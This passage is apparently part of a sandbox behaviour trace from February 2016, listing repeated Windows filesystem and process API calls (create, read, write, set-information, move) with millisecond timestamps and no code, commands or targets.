"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,223", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,233", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:03,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:03,453", "api": "NtWriteFile"}, 